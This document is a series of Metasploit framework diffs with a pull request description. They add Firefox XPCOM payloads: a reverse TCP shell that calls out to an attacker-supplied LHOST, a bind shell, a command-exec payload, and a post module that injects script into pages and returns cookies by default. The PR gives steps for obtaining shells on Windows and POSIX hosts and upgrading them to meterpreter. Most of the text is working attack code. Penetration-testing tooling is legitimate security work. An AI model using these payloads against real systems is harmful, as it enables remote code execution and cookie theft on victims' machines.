+++ b/modules/payloads/singles/firefox/exec.rb
@@ -39,9 +39,13 @@ module Metasploit3
         #{read_file_source if datastore['WSCRIPT']}
         #{run_cmd_source if datastore['WSCRIPT']}
 
+        var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
+        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+        var windows = (ua.indexOf("Windows")>-1);
+
         var cmd = (#{JSON.unparse({ :cmd => datastore['CMD'] })}).cmd;
         if (#{datastore['WSCRIPT']} && windows) {
-           runCmd(cmd);
+          runCmd(cmd);
         } else {
           var process = Components.classes["@mozilla.org/process/util;1"]
                           .createInstance(Components.interfaces.nsIProcess);
@@ -51,7 +55,7 @@ module Metasploit3
           if (windows) {
             sh.initWithPath("C:\\\\Windows\\\\System32\\\\cmd.exe");
             args = ["/c", cmd];
-          else {
+          } else {
             sh.initWithPath("/bin/sh");
             args = ["-c", cmd];
           }

--- a/modules/payloads/singles/firefox/exec.rb
+++ b/modules/payloads/singles/firefox/exec.rb
@@ -1,0 +1,39 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/payload/firefox'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Payload::Firefox
+
+  def initialize(info={})
+    super(merge_info(info,
+      'Name'          => 'Firefox XPCOM execute command',
+      'Description'   => 'Runs a shell command on the OS.',
+      'Author'        => ['joev'],
+      'License'       => BSD_LICENSE,
+      'Platform'      => 'firefox',
+      'Arch'          => ARCH_FIREFOX
+    ))
+    register_options([
+      OptString.new('CMD', [ true, "The command string to execute", 'echo HELLO; echo WORLD' ]),
+    ], self.class)
+  end
+
+  def generate
+    <<-EOS
+
+      (function(){
+        #{read_file_source}
+        #{run_cmd_source}
+        runCmd((#{JSON.unparse({:cmd => datastore['CMD']})}).cmd);
+      })();
+
+    EOS
+  end
+end

--- a/modules/payloads/singles/firefox/shell_bind_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb
@@ -66,8 +66,9 @@ module Metasploit3
           onStopRequest: function(request, context) {},
           onDataAvailable: function(request, context, stream, offset, count) {
             var data = NetUtil.readInputStreamToString(stream, count).trim();
-            var output = runCmd(data);
-            outStream.write(output[0], output[0].length);
+            runCmd(data, function(output) {
+              outStream.write(output, output.length);
+            });
           }
         };
       };

--- a/modules/payloads/singles/firefox/shell_bind_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb
@@ -1,0 +1,148 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# It would be better to have a commonjs payload, but because the implementations
+# differ so greatly when it comes to require() paths for net modules, we will
+# settle for just getting shells on nodejs.
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Command Shell, Bind TCP (via Firefox XPCOM script)',
+      'Description'   => 'Creates an interactive shell via Javascript with access to Firefox\'s XPCOM API',
+      'Author'        => ['joev'],
+      'License'       => BSD_LICENSE,
+      'Platform'      => 'firefox',
+      'Arch'          => ARCH_FIREFOX,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'firefox',
+      'Payload'       => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    super + command_string
+  end
+
+  #
+  # Returns the JS string to use for execution
+  #
+  def command_string
+    %Q|
+    (function(){
+      Components.utils.import("resource://gre/modules/NetUtil.jsm");
+
+      var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
+        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+
+      var lport = #{datastore["LPORT"]};
+      var rhost = "#{datastore['RHOST']}";
+      var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"]
+                             .createInstance(Components.interfaces.nsIServerSocket);
+      serverSocket.init(lport, false, -1);
+      var clientFound = false;
+
+      var listener = {
+        onSocketAccepted: function(serverSocket, clientSocket) {
+          var outStream = clientSocket.openOutputStream(0, 0, 0);
+          var inStream = clientSocket.openInputStream(0, 0, 0);
+          if (clientFound) { outStream.close(); inStream.close(); }
+          client = true;
+          var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
+                     .createInstance(Components.interfaces.nsIInputStreamPump);
+          pump.init(inStream, -1, -1, 0, 0, true);
+          pump.asyncRead(clientListener(outStream), null);
+        }
+      };
+
+      var clientListener = function(outStream) {
+        return {
+          onStartRequest: function(request, context) {},
+          onStopRequest: function(request, context) {},
+          onDataAvailable: function(request, context, stream, offset, count) {
+            var data = NetUtil.readInputStreamToString(stream, count).trim();
+            var output = runCmd(data);
+            outStream.write(output[0], output[0].length);
+          }
+        };
+      };
+
+      var runCmd = function(cmd) {
+        var shPath = "/bin/sh";
+        var shFlag = "-c";
+        var shEsc = "\\\\$&";
+
+        if (ua.indexOf("Windows")>-1) {
+          shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
+          shFlag = "/c";
+          shEsc = "\\^$&";
+        }
+
+        var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
+        var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
+
+        var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
+          .getService(Components.interfaces.nsIProperties)
+          .get("TmpD", Components.interfaces.nsIFile);
+        stdout.append(stdoutFile);
+
+        var stderr = Components.classes["@mozilla.org/file/directory_service;1"]
+          .getService(Components.interfaces.nsIProperties)
+          .get("TmpD", Components.interfaces.nsIFile);
+        stderr.append(stderrFile);
+
+        var sh = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+        sh.initWithPath(shPath);
+
+        var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
+
+        var process = Components.classes["@mozilla.org/process/util;1"]
+          .createInstance(Components.interfaces.nsIProcess);
+        process.init(sh);
+        process.run(true, [shFlag, shell], 2);
+        return [readFile(stdout.path), readFile(stderr.path)];
+      };
+
+      var readFile = function(path) {
+        try {
+          var file = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+          file.initWithPath(path);
+
+          var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
+                           .createInstance(Components.interfaces.nsIFileInputStream);
+          fileStream.init(file, 1, 0, false);
+
+          var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
+                             .createInstance(Components.interfaces.nsIBinaryInputStream);
+          binaryStream.setInputStream(fileStream);
+          var array = binaryStream.readByteArray(fileStream.available());
+
+          binaryStream.close();
+          fileStream.close();
+          file.remove(true);
+
+          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim();
+        } catch (e) { return ["",""]; }
+      };
+
+      serverSocket.asyncListen(listener);
+    })();
+    |
+  end
+end

--- a/modules/payloads/singles/firefox/shell_bind_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb
@@ -3,10 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-# It would be better to have a commonjs payload, but because the implementations
-# differ so greatly when it comes to require() paths for net modules, we will
-# settle for just getting shells on nodejs.
-
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
 require 'msf/core/payload/firefox'

--- a/modules/payloads/singles/firefox/shell_bind_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb
@@ -66,14 +66,13 @@ module Metasploit3
           onStopRequest: function(request, context) {},
           onDataAvailable: function(request, context, stream, offset, count) {
             var data = NetUtil.readInputStreamToString(stream, count).trim();
-            runCmd(data, function(output) {
-              outStream.write(output, output.length);
+            runCmd(data, function(err, output) {
+              if(!err) outStream.write(output, output.length);
             });
           }
         };
       };
 
-      #{read_file_source}
       #{run_cmd_source}
 
       serverSocket.asyncListen(listener);

--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -51,13 +51,12 @@ module Metasploit3
           onStopRequest: function(request, context) {},
           onDataAvailable: function(request, context, stream, offset, count) {
             var data = NetUtil.readInputStreamToString(stream, count).trim();
-            runCmd(data, function(output) {
-              outStream.write(output, output.length);
+            runCmd(data, function(err, output) {
+              if (!err) outStream.write(output, output.length);
             });
           }
         };
 
-        #{read_file_source}
         #{run_cmd_source}
 
         pump.asyncRead(listener, null);

--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -51,8 +51,9 @@ module Metasploit3
           onStopRequest: function(request, context) {},
           onDataAvailable: function(request, context, stream, offset, count) {
             var data = NetUtil.readInputStreamToString(stream, count).trim();
-            var output = runCmd(data);
-            outStream.write(output[0], output[0].length);
+            runCmd(data, function(output) {
+              outStream.write(output, output.length);
+            });
           }
         };
 

--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -1,0 +1,140 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# It would be better to have a commonjs payload, but because the implementations
+# differ so greatly when it comes to require() paths for net modules, we will
+# settle for just getting shells on nodejs.
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Command Shell, Reverse TCP (via Firefox XPCOM script)',
+      'Description'   => 'Creates an interactive shell via Javascript with access to Firefox\'s XPCOM API',
+      'Author'        => ['joev'],
+      'License'       => BSD_LICENSE,
+      'Platform'      => 'firefox',
+      'Arch'          => ARCH_FIREFOX,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'firefox',
+      'Payload'       => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    super + command_string
+  end
+
+  #
+  # Returns the JS string to use for execution
+  #
+  def command_string
+    %Q|
+    (function(){
+      Components.utils.import("resource://gre/modules/NetUtil.jsm");
+
+      var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
+        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+
+      var host = '#{datastore["LHOST"]}';
+      var port = #{datastore["LPORT"]};
+
+      var socketTransport = Components.classes["@mozilla.org/network/socket-transport-service;1"]
+                              .getService(Components.interfaces.nsISocketTransportService);
+      var socket = socketTransport.createTransport(null, 0, host, port, null);
+      var outStream = socket.openOutputStream(0, 0, 0);
+      var inStream = socket.openInputStream(0, 0, 0);
+
+      var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
+                     .createInstance(Components.interfaces.nsIInputStreamPump);
+      pump.init(inStream, -1, -1, 0, 0, true);
+
+      var listener = {
+        onStartRequest: function(request, context) {},
+        onStopRequest: function(request, context) {},
+        onDataAvailable: function(request, context, stream, offset, count)
+        {
+          var data = NetUtil.readInputStreamToString(stream, count).trim();
+          var output = runCmd(data);
+          outStream.write(output[0], output[0].length);
+          outStream.flush();
+        }
+      };
+
+      var runCmd = function(cmd) {
+        var shPath = "/bin/sh";
+        var shFlag = "-c";
+        var shEsc = "\\\\$&";
+
+        if (ua.indexOf("Windows")>-1) {
+          shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
+          shFlag = "/c";
+          shEsc = "\\^$&";
+        }
+
+        var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
+        var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
+
+        var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
+          .getService(Components.interfaces.nsIProperties)
+          .get("TmpD", Components.interfaces.nsIFile);
+        stdout.append(stdoutFile);
+
+        var stderr = Components.classes["@mozilla.org/file/directory_service;1"]
+          .getService(Components.interfaces.nsIProperties)
+          .get("TmpD", Components.interfaces.nsIFile);
+        stderr.append(stderrFile);
+
+        var sh = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+        sh.initWithPath(shPath);
+
+        var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
+        var process = Components.classes["@mozilla.org/process/util;1"]
+          .createInstance(Components.interfaces.nsIProcess);
+        process.init(sh);
+        process.run(true, [shFlag, shell], 2);
+        return [readFile(stdout.path), readFile(stderr.path)];
+      };
+
+      var readFile = function(path) {
+        try {
+          var file = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+          file.initWithPath(path);
+
+          var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
+                           .createInstance(Components.interfaces.nsIFileInputStream);
+          fileStream.init(file, 1, 0, false);
+
+          var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
+                             .createInstance(Components.interfaces.nsIBinaryInputStream);
+          binaryStream.setInputStream(fileStream);
+          var array = binaryStream.readByteArray(fileStream.available());
+
+          binaryStream.close();
+          fileStream.close();
+          file.remove(true);
+
+          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim();
+        } catch (e) { return ""; }
+      };
+
+      pump.asyncRead(listener, null);
+    })();
+    |
+  end
+end

--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -14,7 +14,7 @@ module Metasploit3
   include Msf::Payload::Firefox
   include Msf::Sessions::CommandShellOptions
 
-  def initialize(info = {})
+  def initialize(info={})
     super(merge_info(info,
       'Name'          => 'Command Shell, Reverse TCP (via Firefox XPCOM script)',
       'Description'   => 'Creates an interactive shell via Javascript with access to Firefox\'s XPCOM API',
@@ -24,54 +24,44 @@ module Metasploit3
       'Arch'          => ARCH_FIREFOX,
       'Handler'       => Msf::Handler::ReverseTcp,
       'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'firefox',
-      'Payload'       => { 'Offsets' => {}, 'Payload' => '' }
+      'PayloadType'   => 'firefox'
     ))
   end
 
-  #
-  # Constructs the payload
-  #
   def generate
-    super + command_string
-  end
+    <<-EOS
 
-  #
-  # Returns the JS string to use for execution
-  #
-  def command_string
-    %Q|
-    (function(){
-      Components.utils.import("resource://gre/modules/NetUtil.jsm");
-      var host = '#{datastore["LHOST"]}';
-      var port = #{datastore["LPORT"]};
+      (function(){
+        Components.utils.import("resource://gre/modules/NetUtil.jsm");
+        var host = '#{datastore["LHOST"]}';
+        var port = #{datastore["LPORT"]};
 
-      var socketTransport = Components.classes["@mozilla.org/network/socket-transport-service;1"]
-                              .getService(Components.interfaces.nsISocketTransportService);
-      var socket = socketTransport.createTransport(null, 0, host, port, null);
-      var outStream = socket.openOutputStream(0, 0, 0);
-      var inStream = socket.openInputStream(0, 0, 0);
+        var socketTransport = Components.classes["@mozilla.org/network/socket-transport-service;1"]
+                                .getService(Components.interfaces.nsISocketTransportService);
+        var socket = socketTransport.createTransport(null, 0, host, port, null);
+        var outStream = socket.openOutputStream(0, 0, 0);
+        var inStream = socket.openInputStream(0, 0, 0);
 
-      var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
-                     .createInstance(Components.interfaces.nsIInputStreamPump);
-      pump.init(inStream, -1, -1, 0, 0, true);
+        var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
+                       .createInstance(Components.interfaces.nsIInputStreamPump);
+        pump.init(inStream, -1, -1, 0, 0, true);
 
-      var listener = {
-        onStartRequest: function(request, context) {},
-        onStopRequest: function(request, context) {},
-        onDataAvailable: function(request, context, stream, offset, count)
-        {
-          var data = NetUtil.readInputStreamToString(stream, count).trim();
-          var output = runCmd(data);
-          outStream.write(output[0], output[0].length);
-        }
-      };
+        var listener = {
+          onStartRequest: function(request, context) {},
+          onStopRequest: function(request, context) {},
+          onDataAvailable: function(request, context, stream, offset, count) {
+            var data = NetUtil.readInputStreamToString(stream, count).trim();
+            var output = runCmd(data);
+            outStream.write(output[0], output[0].length);
+          }
+        };
 
-      #{read_file_source}
-      #{run_cmd_source}
+        #{read_file_source}
+        #{run_cmd_source}
 
-      pump.asyncRead(listener, null);
-    })();
-    |
+        pump.asyncRead(listener, null);
+      })();
+
+    EOS
   end
 end

--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -3,12 +3,9 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-# It would be better to have a commonjs payload, but because the implementations
-# differ so greatly when it comes to require() paths for net modules, we will
-# settle for just getting shells on nodejs.
-
 require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
+require 'msf/core/payload/firefox'
 require 'msf/base/sessions/command_shell'
 
 module Metasploit3

--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -14,6 +14,7 @@ require 'msf/base/sessions/command_shell'
 module Metasploit3
 
   include Msf::Payload::Single
+  include Msf::Payload::Firefox
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
@@ -45,10 +46,6 @@ module Metasploit3
     %Q|
     (function(){
       Components.utils.import("resource://gre/modules/NetUtil.jsm");
-
-      var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
-        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
-
       var host = '#{datastore["LHOST"]}';
       var port = #{datastore["LPORT"]};
 
@@ -74,64 +71,8 @@ module Metasploit3
         }
       };
 
-      var runCmd = function(cmd) {
-        var shPath = "/bin/sh";
-        var shFlag = "-c";
-        var shEsc = "\\\\$&";
-
-        if (ua.indexOf("Windows")>-1) {
-          shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
-          shFlag = "/c";
-          shEsc = "\\^$&";
-        }
-
-        var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
-        var stderrFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
-
-        var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
-          .getService(Components.interfaces.nsIProperties)
-          .get("TmpD", Components.interfaces.nsIFile);
-        stdout.append(stdoutFile);
-
-        var stderr = Components.classes["@mozilla.org/file/directory_service;1"]
-          .getService(Components.interfaces.nsIProperties)
-          .get("TmpD", Components.interfaces.nsIFile);
-        stderr.append(stderrFile);
-
-        var sh = Components.classes["@mozilla.org/file/local;1"]
-                   .createInstance(Components.interfaces.nsILocalFile);
-        sh.initWithPath(shPath);
-
-        var shell = shPath + " " + shFlag + " " + (cmd + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
-        var process = Components.classes["@mozilla.org/process/util;1"]
-          .createInstance(Components.interfaces.nsIProcess);
-        process.init(sh);
-        process.run(true, [shFlag, shell], 2);
-        return [readFile(stdout.path), readFile(stderr.path)];
-      };
-
-      var readFile = function(path) {
-        try {
-          var file = Components.classes["@mozilla.org/file/local;1"]
-                   .createInstance(Components.interfaces.nsILocalFile);
-          file.initWithPath(path);
-
-          var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
-                           .createInstance(Components.interfaces.nsIFileInputStream);
-          fileStream.init(file, 1, 0, false);
-
-          var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
-                             .createInstance(Components.interfaces.nsIBinaryInputStream);
-          binaryStream.setInputStream(fileStream);
-          var array = binaryStream.readByteArray(fileStream.available());
-
-          binaryStream.close();
-          fileStream.close();
-          file.remove(true);
-
-          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("").trim();
-        } catch (e) { return ""; }
-      };
+      #{read_file_source}
+      #{run_cmd_source}
 
       pump.asyncRead(listener, null);
     })();

--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -64,7 +64,6 @@ module Metasploit3
           var data = NetUtil.readInputStreamToString(stream, count).trim();
           var output = runCmd(data);
           outStream.write(output[0], output[0].length);
-          outStream.flush();
         }
       };
 

--- a/modules/post/firefox/gather/xss.rb
+++ b/modules/post/firefox/gather/xss.rb
@@ -13,11 +13,7 @@ class Metasploit3 < Msf::Post
         This module runs the provided SCRIPT as javascript in the
         origin of the provided URL. It works by navigating a hidden
         ChromeWindow to the URL, then injecting the SCRIPT with Function.
-
-        The value returned by SCRIPT is sent back to the Metasploit instance.
-        The callback "send(result)" can also be used to return data for
-        asynchronous scripts.
-
+        The callback "send(result)" is used to send data back to the listener.
       },
       'License'       => MSF_LICENSE,
       'Author'        => [ 'joev' ],
@@ -25,7 +21,7 @@ class Metasploit3 < Msf::Post
     ))
 
     register_options([
-      OptString.new('SCRIPT', [true, "The javascript command to run", 'return document.cookie']),
+      OptString.new('SCRIPT', [true, "The javascript command to run", 'send(document.cookie)']),
       OptPath.new('SCRIPTFILE', [false, "The javascript file to run"]),
       OptString.new('URL', [
         true, "URL to inject into", 'http://metasploit.com'

--- a/modules/post/firefox/gather/xss.rb
+++ b/modules/post/firefox/gather/xss.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'json'
 
 class Metasploit3 < Msf::Post
   def initialize(info={})

--- a/modules/post/firefox/gather/xss.rb
+++ b/modules/post/firefox/gather/xss.rb
@@ -1,0 +1,84 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Firefox XSS',
+      'Description'   => %q{
+        This module runs the provided SCRIPT as javascript in the
+        origin of the provided URL. It works by navigating a hidden
+        ChromeWindow to the URL, then injecting the SCRIPT with Function.
+
+        The value returned by SCRIPT is sent back to the Metasploit instance.
+        The callback "send(result)" can also be used to return data for
+        asynchronous scripts.
+
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'joev' ],
+      'Platform'      => [ 'firefox' ]
+    ))
+
+    register_options([
+      OptString.new('SCRIPT', [true, "The javascript command to run", 'return document.cookie']),
+      OptPath.new('SCRIPTFILE', [false, "The javascript file to run"]),
+      OptString.new('URL', [
+        true, "URL to inject into", 'http://metasploit.com'
+      ]),
+      OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])
+    ], self.class)
+  end
+
+  def run
+    results = cmd_exec(",JAVASCRIPT,#{js_payload},ENDSCRIPT,", nil, datastore['TIMEOUT'])
+
+    if results.present?
+      print_good results
+    else
+      print_error "No response received"
+    end
+  end
+
+  def js_payload
+    js = datastore['SCRIPT'].strip
+    %Q|
+
+      (function(){
+        var hiddenWindow = Components.classes["@mozilla.org/appshell/appShellService;1"]
+                               .getService(Components.interfaces.nsIAppShellService)
+                               .hiddenDOMWindow;
+
+        hiddenWindow.location = 'about:blank';
+        var src = (#{JSON.unparse({ :src => js })}).src;
+        var XHR = hiddenWindow.XMLHttpRequest;
+        var key = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";
+        hiddenWindow[key] = true;
+        hiddenWindow.location = "#{datastore['URL']}";
+        
+        var evt = function() {
+          if (hiddenWindow[key]) {
+            schedule(evt);
+          } else {
+            schedule(function(){
+              cb(hiddenWindow.Function(src)());
+            }, 500);
+          }
+        };
+
+        var schedule = function(cb, delay) {
+          var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
+          timer.initWithCallback({notify:cb}, delay\|\|200, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
+          return timer;
+        };
+
+        schedule(evt);
+      })();
+
+    |.strip
+  end
+end

--- a/spec/lib/msf/core/exploit/remote/firefox_addon_generator_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/firefox_addon_generator_spec.rb
@@ -1,0 +1,38 @@
+require 'spec_helper'
+require 'msf/core'
+
+describe Msf::Exploit::Remote::FirefoxAddonGenerator do
+  let(:datastore) { { 'TARGET' => 0 } }
+  let(:jar) {
+    j = double(:pack => '@JAR@')
+    j.stub(:build_manifest)
+    j
+  }
+  let(:payload) { double(:encoded => '@EXE@', :encoded_jar => jar) }
+  let(:framework) { double(:nops => nil) }
+  let(:cli) { double }
+
+  subject(:mod) do
+    mod = Msf::Exploit::Remote.allocate
+    mod.extend described_class
+    mod.extend Msf::Exploit::Remote::BrowserExploitServer
+    mod.send(:initialize, {})
+    mod.stub(
+      :payload => payload,
+      :regenerate_payload => payload,
+      :framework => framework,
+      :datastore => datastore
+    )
+    mod
+  end
+
+  describe '#generate_addon_xpi' do
+    let(:xpi) { mod.generate_addon_xpi(cli) }
+
+    it { should respond_to :generate_addon_xpi }
+
+    it 'should return an instance of Rex::Zip::Archive' do
+      xpi.should be_kind_of Rex::Zip::Archive
+    end
+  end
+end

--- a/spec/lib/msf/core/exploit/remote/firefox_addon_generator_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/firefox_addon_generator_spec.rb
@@ -3,11 +3,7 @@ require 'msf/core'
 
 describe Msf::Exploit::Remote::FirefoxAddonGenerator do
   let(:datastore) { { 'TARGET' => 0 } }
-  let(:jar) {
-    j = double(:pack => '@JAR@')
-    j.stub(:build_manifest)
-    j
-  }
+  let(:jar) { double(:pack => '@JAR@', :build_manifest => nil) }
   let(:payload) { double(:encoded => '@EXE@', :encoded_jar => jar) }
   let(:framework) { double(:nops => nil) }
   let(:cli) { double }


### PR DESCRIPTION
Adds firefox xpcom payloads and reworks firefox_xpi_bootstrapped_addon and exploit/multi/browser/firefox_proto_crmfrequest modules to include it. I had to add FIREFOX as an arch and platform, which is a little weird. The javascript shell enables a disk-less shell session inside the firefox process. If you deliver the shell via an addon, the addon source will of course be on the disk. Using javascript as the DefaultTarget means that these XCS exploits can work well with browser autopwn.

The following payloads are added:
- firefox/shell_reverse_tcp
- firefox/shell_bind_tcp
- firefox/exec

The following post module:
- post/firefox/gather/xss

This PR also removes the Java target from firefox_addon_generator, since it hasn't worked for a while (tested the original implementation on 10+). The API has changed, and firefox now disables java by default. While it is still possible to (with Chrome privileges) inject an `<applet>`, click the Allow and Run buttons manually, the code needs to be written and tested across versions (css selectors of the buttons may have changed, etc).
#### Verification steps
- [ ] Specs pass
#### `exploit/multi/browser/firefox_xpi_bootstrapped_addon`

IMPORTANT note: after you are done testing a single browser instance, press cmd-shift-a or ctrl-shift-a to enter the AddonsManager and remove the addon if it is still there
- [x] `msf> use exploit/multi/browser/firefox_xpi_bootstrapped_addon`
- [x] `set TARGET 0` `set PAYLOAD firefox/shell_reverse_tcp` `set LHOST [LOCAL-IP]` `set LPORT 4444`
- [x] Ensure you can get a working shell against a windows box
- [x] Ensure you can eventually upgrade the shell to meterpreter (don't forget to kill the handler first): `kill 0` `sessions -u 1`
- [x] You should not see the command prompt pop up while the cmdstager is running
- [x] Ensure you can get a working shell against a posix box
- [x] `set TARGET 0` and `set PAYLOAD firefox/shell_bind_tcp` `set RHOST [IP-OF-VM]` `set LPORT 5555`
- [x] Ensure you can get a working shell against a windows box
- [x] Ensure you can get a working shell against a posix box
#### `exploit/multi/browser/firefox_proto_crmfrequest`

IMPORTANT note: firefox must be restarted between runs for this exploit to work.
- [x] Install some version of firefox between 5.0 and 15.0.1
- [x] `msf> use exploit/multi/browser/firefox_proto_crmfrequest`
- [x] `set TARGET 1` `set PAYLOAD windows/shell_reverse_tcp` `set LHOST [LOCAL-IP]` `set LPORT 4444`
- [x] Ensure you can get a working shell against a windows box
- [x] `set TARGET 4` `set PAYLOAD linux/x86/shell_reverse_tcp` `set LHOST [LOCAL-IP]` `set LPORT 4444`
- [x] Ensure you can get a working shell against a linux box
- [x] `set TARGET 0` `set PAYLOAD firefox/shell_reverse_tcp` `set LHOST [LOCAL-IP]` `set LPORT 4444`
- [x] Ensure you can get a working shell against a windows or posix box 
- [x] `set PAYLOAD firefox/exec` `set CMD echo "JOE" > /Users/joe/Desktop/a.txt`
- [x] Ensure `/Users/joe/Desktop/a.txt` exists and contains `JOE` on a posix system
- [x] Repeat exec but on a windows system: `set CMD calc` and verify calc appears
#### `post/firefox/gather/xss`
- [x] `msf> use post/firefox/gather/xss`
- [x] Visit http://metasploit.com in the shelled browser
- [x] `set SESSION 1` `set URL http://metasploit.com` `set SCRIPT send(document.cookie)`
- [x] It should echo your cookie
### Todo
- convert `exploit/multi/browser/firefox_svg_plugin` to use javascript payloads
